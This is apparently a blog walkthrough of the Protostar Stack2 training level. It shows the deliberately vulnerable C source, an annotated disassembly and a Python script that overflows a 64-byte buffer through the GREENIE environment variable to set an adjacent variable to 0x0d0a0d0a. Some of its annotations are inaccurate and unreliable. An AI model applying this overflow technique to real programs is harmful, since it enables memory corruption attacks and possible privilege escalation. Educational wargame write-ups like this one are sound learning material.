Binary Exploitation Protostar Stack2 - Walkthrough - Writeup

Hello Guyz,




In This Post, I am going to show you how we can win protostar stack2 level and in today's tutorial, our main focus will be on variable overwriting and environment variable manipulation. In This Challenge, we are going to learn how we can use environment variables as a bridge to Stack so that we can overwrite the values of any variable Onto Stack during running state.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.


Source Code :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}



Hint Provided By Exploit-Exercise

Stack2 looks at environment variables, and how they can be set.

This level is at /opt/protostar/bin/stack2


Stack

0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Injectable Area                                      | modified | 
 ============================================================================================



Disassembly Of Codes

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Dump of assembler code for function main:
   0x08048494 <+0>: push   ebp
   0x08048495 <+1>: mov    ebp,esp
   0x08048497 <+3>: and    esp,0xfffffff0
   0x0804849a <+6>: sub    esp,0x60                            << ==== 96 Bits Buffer Created
   0x0804849d <+9>: mov    DWORD PTR [esp],0x80485e0           << ==== Moving Something Into Stack Top
   0x080484a4 <+16>: call   0x804837c <getenv@plt>          << ==== Call GetEnvironment Function
   0x080484a9 <+21>: mov    DWORD PTR [esp+0x5c],eax        << ==== Load Number Of GREENIE variable found
   0x080484ad <+25>: cmp    DWORD PTR [esp+0x5c],0x0        << ==== Comparing GREENIE with number
   0x080484b2 <+30>: jne    0x80484c8 <main+52>             << ==== Jump Condition
   0x080484b4 <+32>: mov    DWORD PTR [esp+0x4],0x80485e8
   0x080484bc <+40>: mov    DWORD PTR [esp],0x1
   0x080484c3 <+47>: call   0x80483bc <errx@plt>
   0x080484c8 <+52>: mov    DWORD PTR [esp+0x58],0x0        << ==== assign 0 into modified variable
   0x080484d0 <+60>: mov    eax,DWORD PTR [esp+0x5c]        << ==== Copy GREENIE variable from stack To EAX
   0x080484d4 <+64>: mov    DWORD PTR [esp+0x4],eax         << ==== Copy GREENIE address from EAX to Top of Stack
   0x080484d8 <+68>: lea    eax,[esp+0x18]                  << ==== LOad Starting Address Of Stack To Update buffer variable
   0x080484dc <+72>: mov    DWORD PTR [esp],eax             << ==== Copy Starting Buffer Address To Top Of Stack
   0x080484df <+75>: call   0x804839c <strcpy@plt>          << ==== call strcpy
   0x080484e4 <+80>: mov    eax,DWORD PTR [esp+0x58]
   0x080484e8 <+84>: cmp    eax,0xd0a0d0a
   0x080484ed <+89>: jne    0x80484fd <main+105>
   0x080484ef <+91>: mov    DWORD PTR [esp],0x8048618
   0x080484f6 <+98>: call   0x80483cc <puts@plt>
   0x080484fb <+103>: jmp    0x8048512 <main+126>
   0x080484fd <+105>: mov    edx,DWORD PTR [esp+0x58]
   0x08048501 <+109>: mov    eax,0x8048641
   0x08048506 <+114>: mov    DWORD PTR [esp+0x4],edx
   0x0804850a <+118>: mov    DWORD PTR [esp],eax
   0x0804850d <+121>: call   0x80483ac <printf@plt>
   0x08048512 <+126>: leave  
   0x08048513 <+127>: ret 


Exploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/python
# -*- coding:utf-8 -*-


# import modules
import struct
import os

NP = '41'        # 41 [hex]  = a

# Total Buffer In Stack 60 in hex
tbis = [NP for i in range(96)]


# var value 92-96 == [esp+5c] |  0xd0a0d0a

tbis[92:] = ['0d','0a','0d','0a'][::-1] # In Reverse



# Remove Padding 0x18 [hex]
payload ='\\x'+ '\\x'.join([i for i in tbis[28:]])


# create a dummy environment variable
os.environ['GREENIE']=payload.decode('string_escape')

# run 
os.system('./bin/stack2')





Another Victory! Yeah


For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »